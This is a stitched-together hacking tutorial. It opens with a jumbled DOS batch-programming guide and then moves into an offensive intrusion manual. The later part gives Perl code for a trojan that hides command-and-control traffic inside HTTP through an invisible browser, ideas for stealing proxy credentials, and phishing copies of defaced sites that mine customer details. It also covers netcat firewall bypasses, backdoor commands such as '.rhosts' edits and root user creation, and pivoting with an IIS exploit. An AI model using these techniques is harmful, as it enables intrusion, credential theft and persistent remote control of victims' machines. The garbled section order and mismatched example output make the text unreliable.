HACKING TRUTH:

We can also check for more than one file at a time,
in the following way:
IF EXIST c:\autoexec.bat IF EXIST c:\autoexec.bak ECHO Both Exist
****************** 

We can check to see if a file does not exist in the same way, the basic
syntax now becomes:

IF NOT EXIST FILENAME Command
For Example,
IF NOT EXIST c:\mystylepro.doc ECHO It doesn't Exist
**************** 

HACKING TRUTH: How do you check for the existence of directories?
No something like IF C:\windows EXISTS ECHO Yes does not work. In
this case we need to make use of the NULL device. The NULL device is
basically nothing, it actually stands for simply nothing. Each directory
has the NULL device present in it. (At least DOS thinks so.) So to
check if c:\windows exits, simply type:
IF EXIST c:\windows\nul ECHO c:\Windows exists.
One can also check if a drive is valid, by giving something like:
IF EXIST c:\io.sys ECHO Drive c: is valid.
****************
Comparing Strings to Validate Parameters
The basic syntax is:
IF [NOT] string1==string2 Command
Now let's make our scripts intelligent and make them perform a task
according to what parameter was passed by the User. Take the
following snippet of code for example,
@ECHO off
IF %1==cp GOTO COPY
GOTO DEL
:COPY
Copy %2 a:
GOTO :END
:DEL
Del %2
:END
This example too is pretty much self explanatory. The IF Statement
compares the first parameter to cp, and if it matches then DOS is sent
to read the COPY label else to the DEL label. This example makes use
of two parameters and is called by passing at least two parameters.
We can edit the above example to make DOS check if a parameter was
passed or not and if not then display an error message. Just add the
following lines to the beginning of the above file.
@ECHO OFF
IF "%1" == "" ECHO Error Message Here
If no parameter is passed then the batch file displays an error
message. Similarly we can also check for the existence of the second
parameter.
This command too has the NOT clause.

IF: CONDITIONAL BRANCHING

The If statement is a very useful command which allows us to make the
batch files more intelligent and useful. Using this command one can make
the batch programs check the parameters and accordingly perform a
task. Not only can the IF command check parameters, it can also checks
if a particular file exists or not. On top of all this, it can also be used
for the conventional checking of variables (strings).
Checking If a File Exists Or Not
The general syntax of the IF command which checks for the existence
of a file is the following:
IF [NOT] EXIST FILENAME Command
This will become clearer when we take up the following example,
IF EXIST c:\autoexec.bat ECHO It exists

This command checks to see if the file, c:\autoexec.bat exists or not.
If it does then it echoes or prints the string 'It exists'. On the other
hand if the specified file does not exist, then it does not do anything.
In the above example, if the file autoexec.bat did not exist, then
nothing was executed. We can also put in the else clause i.e. If the File
exists, do this but if it does not exists, by using the GOTO command.
Let's consider the following example to make it more clear:
@echo off
IF EXIST C:\anil.doc GOTO ANIL
Goto end
:ANIL
ECHO ANIL
:end
The IF statement in this code snippet checks to see if there exists a
file, c:\anil.doc. If it does then DOS is branched to :ANIL and if it
does not, then DOS goes on to the next line. The next line branches
DOS to :end. The :end and :ANIL in the above example are called
labels. After the branching the respective echo statements take over.

SHIFT: Infinite Parameters

Sometimes your batch file program may need to use more than nine
parameters at a
time.(Actually you would never need to, but at least you are sure you
can handle
it if you need to.)To see how the SHIFT command works, look at the
following
snippet of code:
@ECHO OFF
ECHO The first Parameter is %1
ECHO.
SHIFT
ECHO The Second Parameter is %1
ECHO.
SHIFT
ECHO The Second Parameter is %1
Now execute this batch file from DOS and see what happens.
C:\windows>batch_file_name abc def ghi 

The first Parameter is abc
The Second Parameter is def
The Second Parameter is ghi
How does it work? Well, each SHIFT command shuffles the parameters
down one position. This means that after the first SHIFT %1 becomes def, %2
becomes ghi
and abc is completely removed by DOS. All parameters change and move
one position
down.
Both normal parameters (%1 , % 2 etc) and the SHIFT command can be
made more
efficient by grouping them with the IF conditional statement to check
the
parameters passed by the User.
THE FOR LOOP
The syntax of the FOR LOOP is:
FOR %%PARAMETER IN(set) DO command
Most people change their mind about learning Batch Programming when
they come
across the syntax of the For Command. I do agree that it does seem a
bit weird,
but it is not as difficult as it appears to be. Let's analyze the various
parts
of the For command. Before we do that look at the following example,
@ECHO OFF
CLS
FOR %%A IN (abc, def, xyz) DO ECHO %%A
Basically a FOR LOOP declares a variable (%%A) and assigns it different
values
as it goes through the predefined set of values(abc, def, xyz) and each
time
the variable is assigned a new value, the FOR loop performs a
command.(ECHO %%A)

The %%A is the variable which is assigned different values as the loop
goes
through the predefined set of values in the brackets. You can use any
single
letter character after the two % sign except 0 through 9.We use two
%'s as DOS
deletes each occurrence of a single % sign in a batch file program.
The IN(abc, def, xyz) is the list through which the FOR loop goes. The
variable
%%a is assigned the various values within the brackets, as the loop
moves. The
items in the set(The technical term for the set of values within the
brackets)
can be separated with commas, colons or simply spaces.
For each item in the set(The IN Thing) the FOR loop performs whatever
command is
given after the DO keyword.(In this example the loop will ECHO %%A)
So basically when we execute the above batch file, the output will be:
abc
def
xyz
The FOR loop becomes very powerful if used along with replaceable
parameters. Take
the following batch file, for example,
@ECHO OFF
ECHO.
ECHO I am going to delete the following files:
ECHO %1 %2
ECHO.
ECHO Press Ctrl+C to Abort process
PAUSE
FOR %%a IN (%1 %2 ) DO DEL %%a
ECHO Killed Files. Mission Accomplished.
At execution time, the process would be something like:
C:\WINDOWS>batchfilename *.tmp *.bak
I am going to delete the following files:
*.tmp *.bak
Press Ctrl+C to Abort process
Press any key to continue . . .
Killed Files. Mission Accomplished.

HACKING TRUTH

Say you want to execute a batch file and once the
procedure of
execution is complete, want to leave DOS and return to Windows, what
do you do? The EXIT command can be used in such situations. So simply end your
batch file
with the EXIT. 

Parameters: Giving Information to Batch Programs

To make batch programs really intelligent you need to be able to provide
them
with parameters which are nothing but additional valuable information
which is
needed to ensure that the bath program can work efficiently and
flexibly.
To understand how parameters work, look at the following script:
@ECHO OFF
ECHO First Parameter is %1
ECHO Second Parameter is %2
ECHO Third Parameter is %3
The script seems to be echoing(printing) messages on the screen, but
what do the
strange symbols %1 , % 2 etc stand for? To find out what the strange
symbols stand for save the above script and go to DOS and execute this script
by passing
the below parameters:
C:\windows>batch_file_name abc def ghi
This batch file produces the following result:
C:\windows>batch_file_name abc def ghi
First Parameter is abc
Second Parameter is def
Third Parameter is ghi
The first line in the output is produced by the code line:
ECHO First Parameter is %1
Basically what happens is that when DOS encounters the %1 symbol, it
examines
the original command used to execute the bath program and look for the
first
word (argument) after the batch filename and then assigns %1 the value
of that
word. So one can say that in the ECHO statement %1 is replaced with
the value of
the first argument. In the above example the first word after the
batch file name
is abc, therefore %1 is assigned the value of this word.
The %2 symbol too works in the similar way, the only difference being
that
instead of the first argument, DOS assigns it the value of the second
argument,
def. Now all these symbols, %1, %2 are called replaceable parameters.
Actually
what happens is that %1 is not assigned the value of the first argument,
but
in fact it is replaced by the value of the first argument.

If the batch file command has more parameters than what the batch
file is
looking for, then the extras are ignored. For example, if while executing
a batch
file program , we pass four arguments, but the batch file program
requires only
3 parameters, then the fourth parameter is ignored.
To understand the practical usage of parameters, let's take up a real
life
example. Now the following script requires the user to enter the name
of the
files to be deleted and the folder in which they are located.
@ECHO OFF
CD\
CD %1
DEL %2
This script can be called from the DOS prompt in the following way:
C:\windows>batch_file_name windows\temp *.tmp
In a single script we cannot use more that nine replaceable parameters.
This
means that a particular batch file will have replaceable parameters from
%1 to
%9.Infact there is a tenth replaceable parameter, the %0 parameter.
The %0
parameter contains the name of the batch file itself.

HACKING TRUTH

Say you have saved a batch file in the c:\name
directory. Now when
you launch command.com the default directory is c:\windows and in
order to
execute the batch file program stored in the c:\name directory you
need to
change the directory and go to c:\name.This can be very irritating and
time
consuming. It is a good practice to store all your batch programs in the
same folder. You can run a batch file stored in any folder(Say c:\name) from
anywhere(even c:\windows\history) if you include the folder in which the
batch
file is stored (c:\name)in the AUTOEXEC.BAT file, so that DOS knows
which folder
to look for the batch program.
So simply open c:\autoexec.bat in Notepad and append the Path
statement to the
following line[c:\name is the folder in which all your batch files are
stored.]:
SET PATH=C:\WINDOWS;C:\WINDOWS\COMMAND;C:\name
Autoexec.bat runs each time at startup and DOS knows each time, in
which
directory to look for the batch files.

ECHO OFF

This Batch File deletes all unwanted Temporary files from your system
Now we go to the Windows\temp directory.
Invalid directory
Deleting unwanted temporary files...
File not found
Your System is Now Clean
Hey pretty good! But it still shows the initial ECHO OFF command. You
can prevent a particular command from being shown but still be
executed by preceding the command with a @ sign. So to hide even the
ECHO OFF command, simple replace the
first line of the batch file with @ECHO OFF
You might think that to display a blank line in the output screen you can
simply type ECHO by itself, but that doesn't work. The ECHO command
return whether the ECHO is ON or OFF. Say you have started your
batch file with the command ECHO OFF and then in the later line give
the command ECHO, then it will display ' ECHO is off ' on the screen.
You can display a blank line by giving the command ECHO.(ECHO followed
by a dot)Simply leaving a blank line in the code too displays a blank line
in the output.
You can turn ON the ECHO anytime by simply giving the command ECHO
ON. After turning the echo on , if you give the command ECHO then it
will return ' ECHO is on '
The PAUSE Command: Freezing Time
Say you create a batch file which shows the Directory Listing of a
particular folder(DIR) before performing some other task. Or
sometimes before deleting all files of a folder, you need to give the
user time to react and change his mind. PAUSE, the name says it all, it
is used to time out actions of a script.
Consider the following scenario:
REM This Batch program deletes *.doc files in the current folder.
REM But it gives the user to react and abort this process.
@ECHO OFF
ECHO WARNING: Going to delete all Microsoft Word Document
ECHO Press CTRL+C to abort or simply press a key to continue.
PAUSE
DEL *.doc
Now when you execute this batch program, we get the following output:
C:\WINDOWS>a.bat
WARNING: Going to delete all Microsoft Word Document
Press CTRL+C to abort or simply press a key to continue.
Press any key to continue . . .
The batch file program actually asks the user if he wishes to continue
and gives the user the option to abort the process. Pressing CTRL+C
cancels the batch file program(CTRL+C and CTRL+Break bring about the
same results)
^C
Terminate batch job (Y/N)?y
After this you will get the DOS prompt back.
****************

ECHO: The Batch Printing Tool

The ECHO command is used for what the Print command is in other
programming languages: To Display something on the screen. It can be
used to tell the user what the bath file is currently doing. It is true
that Batch programs display all commands it is executing but sometimes
they are not enough and it is better to also insert ECHO commands
which give a better description of what is presently being done. Say for
example the following batch program which is full of the ECHO
command deletes all files in the c:\windows\temp directory:
ECHO This Batch File deletes all unwanted Temporary files from your
system ECHO Now we go to the Windows\temp directory.
cd windows\temp
ECHO Deleting unwanted temporary files....
del *.tmp
ECHO Your System is Now Clean
Now let's see what happens when we execute the above snippet of batch
code.
C:\WINDOWS>batch_file_name
C:\WINDOWS>ECHO This Batch File deletes all unwanted Temporary
files from your
system
C:\WINDOWS>ECHO Now we go to the Windows\temp directory.
Now we go to the Windows\temp directory.
C:\WINDOWS>cd windows\temp
Invalid directory
C:\WINDOWS>ECHO Deleting unwanted temporary files
Deleting unwanted temporary files...
C:\WINDOWS>del *.tmp
C:\WINDOWS>ECHO Your System is Now Clean
Your System is Now Clean
The above is a big mess! The problem is that DOS is displaying the
executed command and also the statement within the ECHO command.
To prevent DOS from displaying the command being executed, simply
precede the batch file with the
following command at the beginning of the file:

Telnet

The only thing to keep in mind while using Remarks is to not go
overboard and putting in too many of them into a single program as they
tend to slow down the execution time of the batch commands.

The REM Command

The most simple basic Batch file command is the REM or the Remark
command. It is used extensively by programmers to insert comments into
their code to make it more readable and understandable. This command
ignores anything there is on that line. Anything on the line after REM is
not even displayed on the screen during execution. It is normally not
used in small easy to understand batch programs but is very useful in
huge snippets of code with geek stuff loaded into it. So if we
add Remarks to out first batch file, it will become:
REM This batch file is my first batch program which launches the fav
hacking
tool; Telnet

Batch File Programming

Batch file programming is nothing but the Windows version of Unix Shell
Programming. Let's start by understanding what happens when we give a
DOS command. DOS is basically a file called command.com
It is this file (command.com) which handles all DOS commands that you
give at the DOS prompt---such as COPY, DIR, DEL etc. These
commands are built in with the Command.com file. (Such commands which
are built in are called internal commands.).DOS has something called
external commands too such as FORMAT,
UNDELETE, BACKUP etc.
So whenever we give a DOS command either internal or external,
command.com either straightaway executes the command (Internal
Commands) or calls an external separate program which executes the
command for it and returns the result (External Commands.)
So why do I need Batch File Programs? Say you need to execute a set
of commands over and over again to perform a routine task like Backing
up Important Files,Deleting temporary files(*.tmp, .bak , ~.* etc)
then it is very difficult to type the same set of commands over and over
again. To perform a bulk set of same commands over and over again,
Batch files are used. Batch Files are to DOS what Macros are to
Microsoft Office and are used to perform an automated predefined set
of tasks over and over again.
So how do I create batch files? To start enjoying using Batch files, you
need to learn to create Batch files. Batch files are basically plain text
files containing DOS commands. So the best editor to write your
commands in would be Notepad or the DOS Editor (EDIT) All you need
to remember is that a batch file should have the extension .BAT(dot
bat)Executing a batch file is quite simple too. For example if you create
a Batch file and save it with the filename
batch.bat then all you need to execute the batch file is to type:
C:\windows>batch.bat
So what happens when you give a Batch file to the command.com to
execute?
Whenever command.com comes across a batch file program, it goes into
batch mode. In the batch mode, it reads the commands from the batch
file line by line. So basically what happens is, command.com opens the
batch file and reads the first line, then it closes the batch file. It then
executes the command and again reopens the batch file and reads the
next line from it. Batch files are treated as Internal DOS commands.
*********************
Hacking Truth: While creating a batch file, one thing that you need to
keep in mind is that the filename of the batch file should not use the
same name as a DOS command. For example, if you create a batch file
by the name dir.bat and then try to execute it at the prompt, nothing
will happen.This is because when command.com comes across a command,
it first checks to see if it is an internal command. If it is not then
command.com checks if it a .COM, .EXE or .BAT file with a matching
filename.All external DOS commands use either a .COM or a .EXE
extension, DOS never bothers to check if the batch program exits.
*********************
Now let's move on to your first Batch file program. We will unlike
always(Normally we begin with the obligatory Hello World program) first
take up a simple batch file which executes or launches a .EXE program.
Simply type the following in a blank text file and save it with a .BAT
extension.
C:
cd windows
telnet
Now let's analyze the code, the first line tells command.com to go to
the C:Next it tells it to change the current directory to Windows. The
last line tells it to launch the telnet client. You may contradict saying
that the full filename is telnet.exe. Yes you are right, but the .exe
extension is automatically added by command.com. Normally we do not
need to change the drive and the directory as the Windows directory is
the default DOS folder. So instead the bath file could simply contain
the below and would still work.
telnet
Now let's execute this batch file and see what results it shows. Launch
command.com (DOS) and execute the batch file by typing:
C:\WINDOWS>batch_file_name
You would get the following result:
C:\WINDOWS>scandisk
And Scandisk is launched. So now the you know the basic functioning of
Batch files, let' move on to Batch file commands.

Trojans (added 2001/09)

If you are reading this guide, you most prolly have heard of Trojans like Back Orifice , NetBus , Sub7 and the likes. And you prolly know that you connect to these Trojans on certain ports (with some you can even spec the port). This is all nice and neat when you are running a Trojan on a host that is not fire walled. Thing is – hosts that are not fire walled is rarely interesting. What you want is a Trojan on the inside of a network – in the core of a network. Let us assume that your victim is sitting on an unrouted network (10,172.16 or 192.168 net), with proxy firewall and a NAT router in front of it. How do you connect to your Trojan?

Well – you don’t. There is just no way that your packet is going to reach a host on the inside of a properly fire walled network – not even if it is an UDP packet on a super high port – just forget it. So the Trojan writers have come up with some interesting ways to “control” their Trojans. The Trojan could possibly connect out from the network, and register itself on an IRC channel. By chatting to the “robot” you can now control the actions of the Trojan. The same is done with ICQ. This is sweet & all, but what do you do when the user (on the internal network) is not allowed to IRC or ICQ (which is the case on many networks)?

Let think about the problem for a bit. You need a way to communicate with the Trojan – you need to send data to it, and receive data from it. Somehow you got to get info from the host, and send data to the host. In a tightly filtered, fire walled network – what goes in and out of the network? Let’s think – a user in such a network – how does the user communicate with the outside world? What applications does the user use? Email for one. Browsing. For sure – most employees can browse the net. Lets concentrate on HTTP for now. Email has some nasty problems.

HTTP is made up of two parts – a request and a reply. The request is made at the client, and the reply is send from the webserver. No matter how complex the setup with proxies, content filters, virus scanners, NAT, firewalling, the browser makes an HTTP request and the server replies with a reply. In between the client and the server a lot can happen. A firewall might check that the request is really a HTTP request and that the response is a valid HTTP reply – but still – data is send and received (inside the HTTP spec). Thus – if the Trojan sends data within a HTTP request and the server sends data in a HTTP reply we got two-way communication.
HTTP is not without problems. The Trojan needs to make the connection to a host. A normal HTTP request could look like this:

GET /data HTTP/1.0
This is fine when not using a proxy. But (as has been shown earlier) if you use a proxy then the request looks like this:

GET http://server.com/data HTTP/1.0
Thus – the Trojan must detect if a proxy is configured – if so – it needs to get the address of the proxy, make the connection to the proxy, and alter the HTTP request so that the proxy knows where to connect to. How do we know if we should use a proxy – well – it’s a setting in the registry. Hereby part of a PERL script that will do just that:

$string="regedit -a c:\\reg.txt “."\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\"";
@no=`$string`;
if (open (REG,"c:\\reg.txt")){;
while (<REG>){
if ($_ =~ /ProxyEnable/) {
if ($_ =~ /1/) {$proxy=1;}
}
if ($_ =~ /ProxyServer/){
($duh,$proxystring)=split(/\=/,$_);
$proxystring=~s/\"//g;
($proxyserver,$proxyport)=split(/:/,$proxystring);
chomp $proxyserver; chomp $proxyport;
print STDOUT "[proxyserver = $proxyserver, port = $proxyport]\n";
}
}
}
if ($proxy==1) {
print "We have a proxy\n";
$host=$proxyserver; $port=$proxyport;
} else {
print "No proxy\n";
$host=$myhost; $port=$myport;
}
Another problem with HTTP is encoding – special character have the tendency to get buggered if transmitted without being encoded first. No problem – we just encode the request and the reply in hex. No doubt others will quickly find ways to build basic compressions into this as well – but hereby a PERL script that will encode a string as needed (this only the request – the reply is exactly the same):

$response =~ s/(.)/(sprintf("%%%x",ord($1)))/ge;
$response =~ s/([\n])/(sprintf("%%%x",ord($1)))/ge;
On the other end – the response is decoded:
@hexit=split(/\%/,$data);
foreach $char (@hexit){printf("%c",hex($char));}

So – building a client/server is not that difficult. Lets look at the process:
• Victim executes the Trojan code
• Trojan queries registry to see if there is a proxy configured
• Trojan send a HTTP request (via proxy or direct) to the “controller”, stating that it is “alive”.
• Controller process accepts the HTTP request, prompts the controller for a command.
• Command is entered, encoded, and encoded in a HTTP reply.
• Trojan gets the reply, decodes the command and executes it.
• Trojan gets the output of the command, encodes it, and encodes it into the next HTTP request.
• Process repeats
This tends to work fine…excepts (always) when the proxy is using User Authentication. See, then the request needs to contain User Authentication information, and we no way to know this piece of information. Request without authentication information is simply not passed along to the “server”. So…now what?

We can control the registry. The proxy settings are stored in the registry. How about we change the proxy – just for a while – so it point to a process that is under the control of the Trojan (setting it to localhost)? Clearly the username and password will be passed to us then? And after we have this, we simply point the proxy setting back to the original proxy. This would mean that the first time our Trojan fires up, the user will be prompted for a username and password, but most users do this without thinking about it twice. After this, we have the username and the password, and the requests that the Trojan makes could contain the Authentication information. Neatish, but really not elegant enough.

What if we control the browser? Microsoft has this cool thing called OLE, and it is used to control applications with other external programs (that how apps gets their help files in your browser). An external process can start a browser, surf the net and do just about anything. And it can do it without showing a browser to the user on the screen – it runs in the background. So the idea would be to let the Trojan control the browser, to let the browser surf for example “http://controller/<output of command, encoded>”. But how do we get the command to execute back? See – it would be fine if we can “surf” a page that contains the next command, and save the output of the “webpage” to a file. The file would contain the next command to execute, and the subsequent request would be the output of that command. But the Microsoft guys aren’t that stupid – the only browser function that cannot be controlled with OLE is “Save to disk”. So how do we get the next command? Luckily the browser displays the title of a webpage as the browser window title. And the title can be read with OLE. So – we only need to send the command (encoded) as the title of the reply. Confused? OK – lets do it slowly.
On the client (Trojan) side we start an “invisible browser”:
my $ie = Win32::OLE->new('InternetExplorer.Application');
$ie->{Visible} =0;

After encoding the output (of the previous command) we let the browser surf there with OLE:
$ie->Navigate("http://$host:$port/$response");
In the above case, $host and $port will be that of the “controller” process. We don’t have to worry about proxies and authentication – the browser that we control runs with the properties of other normal browsers.

At the controller side, we get the request, decode it and display it:
#getting the answer from trojan
while (<NS>) {
$getin=$_;
if ($getin =~ /GET/){
#decode it
@hexit=split(/\%/,$getin);
foreach $char (@hexit){
printf("%c",hex($char));
}
goto outofit
}
}
Now – at the controller – we prompt the controller for the new command, encode it, and put it in the title of the returned “webpage”:
#encode command
$command =~ s/(.)/(sprintf("x%x",ord($1)))/ge;
$command =~ s/([\n])/(sprintf("x%x",ord($1)))/ge;
####Build HTTP response
$xtosend=<<EOT
HTTP/1.1 200 OK^M
Server: Microsoft-IIS/4.0^M
Date: Tue, 01 Apr 2000 00:00:00 GMT
Content-Type: text/html
<title\>$command\$\<\/title\>
EOT
;
$xtosend=~s/\n/\r\n/g;
print NS $xtosend;
As can be seen – the encoded response (.the new command) is contained in the title of the page. Nice how we respond like we are an IIS server version 4. Oh, and note the date.
At the Trojan side we now have to extract the title from the “browser” with OLE. With OLE we can even check if the “browser” is finished downloading our reply:
#wait to download complete..
for (;;){
sleep 2;
if ($ie->{Busy} == 0) {last;}
}
#get the new command -its in the location field..
$com=($ie->{LocationName});
And that is that. No worries about proxies or authentication. With this example we used a “command”, but it would work fine for any form of communication. What I am saying is that you could have a Trojan like Subseven using this form of communication. What I explained is just a medium – what you put on top of this is entirely up to you. A note – there is obviously a limit to the amount of data that you transmit with every request/reply. A GET request is limited to 256 bytes of data, and the size of a titlebar is also limited. Normally the data transmitted from the controller to the Trojan is minimal; it’s the data from the Trojan to the client that can get bulky (like watching the webcam’s feed). A way to get past this problem is to use POSTs and not GETs (some firewalls might block POSTs) or to use multiple requests. To make it a reliable communication medium one would prolly have to put checksums and timestamps on the requests and the replies (and remember to compress a bit) – but this is just implementation issues. Another implementation issue is that of caching. If the Trojan requests the same URL (and a caching proxy is used) the cache will reply, and the controller will never get the request. Adding a random number to the request and reply solves this problem. Oh, and you wouldn’t want to code the Trojan in PERL .

Another way to transport data to and from a Trojan is via DNS request and replies. A request to unknown.sensepost.com ends up at the name server for sensepost.com, no matter how. And the name server for Sensepost.com could reply with a CNAME of “notunknown.Sensepost.com”. And that reply gets to whoever made the request. It does not matter how many name servers passed it on. With DNS requests things gets a little hairy – DNS use UDP as transport, and UDP is not very reliable. Checksums, and packet-stamps are not optional. The problem with this method is that clients in tight firewalled network rarely get to do DNS requests. Normally they connect to their proxy, and the proxy does the actual request.

ICMP ping packets can also be used as a transport mechanism. Embedding the request in the “payload” of the ping request packet and getting the response back in embedded in the response ping packet have been shown to work in environments where ping is allowed to enter and leave a network. Again – in tightly fire walled networks ICMP is rarely allowed to enter or leave.
The bottom line – Trojans where you have to connect to the Trojan is ancient. It works in very limited environments. The first thing to alter is to get the Trojan to connect to the controller – the second is to find a communication media that will work even from non-routed networks. HTTP looks as though it could do the thing.

HTTP - Redirects

We have been concentrating a lot on webservers - like said earlier in this
document, there is an abundance of webservers out there, and they are been
used in more and more situations. Another neat trick is using HTTP
redirects. Many webservers have customized management pages "hidden"
somewhere on the same site. Typically these are developed by the same people
that developed the main site, and are used by the owners of the webpage to
facilitate updating of news snippets, tickers and "new bargain offerings".
In most cases these pages consists of a login page and a pages where the
administrator can change the site content - served after login have
occurred.
Once the backend management page has been found, (see HTTP section – data
mining) and the administrator's username and password has been cracked (see
HTTP - basic authentication or web-based login) you should be in a position
to add, alter or delete items. In most cases the description of these items
(be that a product description, news item, or special offering) is HTML
sensitive. This means it could read like this: <h1> Big savings </h1>. While
this in itself is harmless (unless you want write a note in extra large,
blinking letters about the site's security) it does have potential for
interesting use. By changing the description to an HTTP-redirect you could
redirect clients to a completely different site. An HTTP-redirect looks like
this:
<META HTTP-EQUIV=REFRESH CONTENT=0;URL=http://www.sensepost.com>
Obviously you will have to change the URL unless you want to redirect
visitors to our website. Although this is a quick way to do a complete
deface of a site it should be used for more interesting activities. You
might want to completely copy the "target" website to your server, and
direct customers to a slightly modified copy. The copy would of course mine
customer details and send forms to the real server - it would appear totally
transparent to the casual netizen. The copy could also contain some nasty
content level attacks - remember Brown Orifice(August 2000)?

Network level attack - Source port 20,53

Some of the ancient firewalls and lousy implemented screening routers have a
problem with dealing with FTP reverse connections. For those that does not
know how it works - a normal (active) FTP session works like this. The FTP
client makes a connection from a random port to port 21 on the FTP daemon.
This is the control connection. As soon as you type "ls" or "get" or "put" a
secondary connection (the data connection) is needed. This connection is
made from the FTP server with a source port of 20 to a port on the client.
The client using the FTP native PORT command specifies the destination port
of the reverse connection. As such the client's firewall needs to allow
connection from source port 20 to (high) destination ports in order for the
reverse data connection to be made. With state ful inspection firewalls the
firewall will monitor (sniff) the initial outgoing (control connection)
packets. When it sees the PORT command, it will automatically open the
packet filters to allow the reverse connection to the client on the port
that it specified (this is the source of much mischief - spoofing such PORT
commands could be used to fool the firewall to open up a port on an IP
number that it is not suppose to). Firewalls that do not make use of
stateful inspection have a problem with these reverse connections. If we can
change our source port to 20 we could bypass the filters and connect to an
IP on a high port. How? Using netcat:
> nc -n -p 20 -v 196.38.xxx.251 1024
(UNKNOWN) [196.38.xxx.251] 1023 (?) : Operation timed out
> nc -n -p 20 -v 196.38.xxx.251 1025
(UNKNOWN) [196.38.xxx.251] 1025 (?) : Connection refused
As can be seen from this example - when we connect to a port <= 1024 we hit
the packet filter. Trying ports > 1024 we are bypassing the filter (although
there is nothing running on port 1025. What is the use then - nothing runs
on ports > 1024. Wrong. MS-SQL runs on 1443, IRC on 6667, some Cisco
configurations on 2001,3001, Squid on 3128, and a lot of proxies on
1080,8080 etc. So let us assume that we want to access an MS-SQL box sitting
behind a crappy firewall that allows connection with source port 20. How do
we put it all together? Netcatagain:
> cat > go.sh:
#!/bin/sh
/usr/local/bin/nc -p 20 -n victim 1433
^D
> nc -l -p 1433 -e go.sh
Hit your own machine with Microsoft SQL Enterprise Manager.
This is just about straight from the net cat documentation - so be sure to
read it as well. go.shis execute when the SQL manager hit port 1433; it
makes a connection to the victim using source port 20.
For applications that use multiple connections (such as HTTP) you will need
to have ncin a loop - so that it fires off a new instance of go.shfor
every new connection. As this is explained in the net cat docs I will not
repeat it here.
In exactly the same way you could experiment with source port 53 - (DNS zone
transfers). Also keep in mind that we are only taking about TCP here - think
about DNS...source port 53 to high ports using UDP, and NFS running on port
2049...get creative!

What to execute?

OK so you have a shell on a Unix server. Your problems will be twofold - the
host does not contain any useful security tools and there is no compiler
(gcc,cc) on the server. So even if you transfer your C-code to the victim
there is just no way to compile it. Don't even think of transferring the
binaries unless the victim is running the exact same OS. This is the reason
why I like to keep things very simple - try to keep your goodies in shell
script or PERL - makes is very platform independent. Chances are very good
to find PERL on the victim - most OS'es have PERL in its distribution.
If you need a tool that is not available in PERL or script then you have to
re-compile it on the victim's platform. If the victim have no compiler, or
the program does not want to compile (making nmapfrom sources on a VMS
mainframe can become hairy) then you will have to find a "friendly" platform
where you can compile the sources and transfer the binaries to the victim.
This is not so easy as it seems and you will see many "If anyone has an IRIX
machine to spare drop me a mail"-type messages in hacker newsgroups or
mailing lists.

Unix

If you have found some way to execute a command on a Unix box, but there's
no port 23 open - don't despair - you could try to export an xtermto your
box (assuming that you are running an X-server, and you do not block
incoming traffic on port 6000).
> xhost +victim
> your_exploit victim "/usr/X11R6/bin/xterm -display attacker:0.0&"
The above-mentioned command will export an xtermto your server (provided
that xtermis located in /usr/X11R6/bin).
Say you want to rloginto the host, and want to modify the relevant files to
be able to rloginto the host:
> your_exploit victim "echo + + >> /.rhosts"
> rlogin -l root victim
The possibilities are endless. You might want to add a UID 0, GID 0user to
the password file, with a blank password, then telnet and become root. Once
you can execute a command on a UNIX host there should be no reason to be
able to compromise the host.
We are assuming that the command is executed with "root" rights. If this is
not the case, things can get slightly more difficult. Keep in mind that
normal users cannot have processes that listens on ports lower than 1024. If
you plan to get a shell spawning netcatmake sure it listens on a port
higher than 1024.

What to execute?

A tool that I like using once command line access has been gained on a NT
box is FSCAN.EXE(get it at Packetstorm or at
www.sensepost.com/book/fscan.exe). It is a nifty command line portscanner
that is packed with features. Once compromised, this portscanner is
uploaded, and scanning on the rest of the network can begin. Make sure that
you know where to scan - study your surroundings, like explained earlier.
Let us look at an example:
>fscan 169.xxx.201.1-169.xxx.201.255 -p 80,1433,23 -o
c:\inetpub\wwwroot\sportscan.txt
Above portscan will identify all host running webservers, telnet daemons and
MS-SQL, and will send the output directly to a file called sportscan.txt
that is located in the webroot -ready to be surfed. The output of such a
scan could look like this:
Scan started at Thu Oct 12 05:22:23 2000
169.xxx.201.2 23/tcp 
169.xxx.201.4 80/tcp
169.xxx.201.4 1433/tcp
169.xxx.201.11 80/tcp
169.xxx.201.20 1433/tcp
169.xxx.201.77 80/tcp
169.xxx.201.160 80/tcp
169.xxx.201.254 23/tcp
Scan finished at Thu Oct 12 05:52:53 2000
Time taken: 765 ports in 30.748 secs (24.88 ports/sec)
From this portscan we can neatly identify potential "next hop" servers. If
we assume that 169.xxx.201.4 is located in the private network (and that the
host where this scan was executed from is in the DMZ) it makes sense to try
to find the same vulnerabilities on 169.xxx.201.4. The idea is thus to
compromise this host - that will give us access to resources on the private
network. It might even be interesting to see what is running on the MS-SQL
part of the server. We now want to be able to fire up SQL Enterprise server,
hop via the compromised host right onto the SQL port on 169.xxx.201.4
(assuming of course that we cannot go there direct). How is this
accomplished? One way could be to hook two instances of netcattogether -
something like nc -l -p 53 -e 'nc 169.xxx.201.4 1443', but I have found that
this method does not work that nice in all situations. Courtesy of a good
friend of mine (you know who you are) enter TCPR.EXE. Tcpr.exetakes 4
arguments:
tcpr <listenPort> <destinationIP> <destinationPort> <killfile>
Tcprstarts to listen on listenPort, relaying (on a network level) all
traffic to destinationIPon port destinationPort. Before it relays a
connection it checks for the existence of killfile, and if so, it exists
very quietly. The killfileis only there to make it easy to kill the relay
as there is no kill `ps -ax | grep tcpr | awk '{print $1}'`available in the
standard NT distribution. With tcprwe can now redirect traffic on a non-filtered port on the first host to a port on the next victim. The TCPR.EXE
program and source is available at www.sensepost.com/book/tcp.zip. (note:
yeah I know its not there – ask me for it and I’ll send it to you).
Keeping all of above in mind, we could reach the SQL server by uploading
tcpr.exeto the victim and executing the following command (let us assume
that the site is vulnerable to the Unicode exploit - the attacker is using
my Unicode PERL exploit, port 53 is not filtered, and tcpr.exehas been
uploaded to c:\tempusing the upload page):
perl unicodexecute2.pl <target>:80 'c:\temp\tcpr 53 169.xxx.201.4 1443
c:\blah.txt'
Pointing your SQL enterprise manager to <target> on port 53 will now reach
the SQL server running on the inside of the private network. Assuming a
blank SA password, we are home free. When we are finished with the SQL
server, and now want to attack the webserver we simple do:
perl unicodexecute2.pl <target>:80 'echo aaa > c:\blah.txt'
telnet <target> 53
perl unicodexecute2.pl <target>:80 'del c:\blah.txt'
perl unicodexecute2.pl <target>:80 'c:\temp\tcpr 53 169.xxx.201.4 80
c:\blah.txt'
Using this technique we can now "daisy chain" several exploitable IIS
